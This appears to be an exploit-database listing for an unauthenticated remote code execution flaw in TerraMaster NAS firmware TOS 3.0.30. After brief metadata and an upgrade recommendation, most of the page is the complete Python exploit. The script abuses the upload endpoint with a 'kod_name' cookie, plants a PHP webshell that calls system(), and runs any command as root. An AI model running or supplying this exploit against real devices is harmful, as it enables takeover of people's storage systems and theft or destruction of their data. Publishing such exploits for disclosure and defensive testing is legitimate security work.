header-logo
Suggest Exploit
vendor:
TOS
by:
Simone 'evilsocket' Margaritelli
9,8
CVSS
HIGH
Remote Code Execution
78
CWE
Product Name: TOS
Affected Version From: TOS 3.0.30
Affected Version To: TOS 3.0.30
Patch Exists: YES
Related CWE: N/A
CPE: a:terramaster:tos
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2017

Terramaster NAS Unauthenticated RCE as root

This exploit allows an attacker to execute arbitrary code on a vulnerable TerraMaster NAS device running TOS version 3.0.30 or earlier. The exploit works by uploading a malicious PHP script to the device, which is then executed remotely. The script is uploaded using a specially crafted HTTP request, which includes a cookie with the value 'kod_name' set to '1'. The script is then executed by sending an HTTP request to the URL of the uploaded script.

Mitigation:

Upgrade to the latest version of TOS, which is not vulnerable to this exploit.
Source

Exploit-DB raw data:

# Source: https://www.evilsocket.net/2017/05/30/Terramaster-NAS-Unauthenticated-RCE-as-root/

#!/usr/bin/python
# coding: utf8
#
# Exploit: Unauthenticated RCE as root.
# Vendor: TerraMaster
# Product: TOS <= 3.0.30 (running on every NAS)
# Author: Simone 'evilsocket' Margaritelli <evilsocket@protonmail.com> 
import sys
import requests
def upload( address, port, filename, path = '/usr/www/' ):
    url = "http://%s:%d/include/upload.php?targetDir=%s" % ( address, port, path )
    try:
        files = { 'file': open( filename, 'rb' ) }
        cookies = { 'kod_name': '1' } # LOL :D
        r = requests.post(url, files=files, cookies=cookies)
        if r.text != '{"jsonrpc" : "2.0", "result" : null, "id" : "id"}':
            print "! Unexpected response, exploit might not work:\n%s\n" % r.text
        return True
    except Exception as e:
        print "\n! ERROR: %s" % e
    return False
def rce( address, port, command ):
    with open( '/tmp/p.php', 'w+t' ) as fp:
        fp.write( "<?php system('%s'); ?>" % command )
    if upload( address, port, '/tmp/p.php' ) == True:
        try:
            url = "http://%s:%d/p.php" % ( address, port )
            return requests.get(url).text
        except Exception as e:
            print "\n! ERROR: %s" % e
    return None
if len(sys.argv) < 3:
    print "Usage: exploit.py <ip|hostname> <command> (port=8181)\n"
    quit()
target  = sys.argv[1]
command = sys.argv[2]
port    = 8181 if len(sys.argv) < 4 else int(sys.argv[3])
out = rce( target, port, command )
if out is not None:
    print out.strip()

Navigation

Suggest Exploit

Services By CQR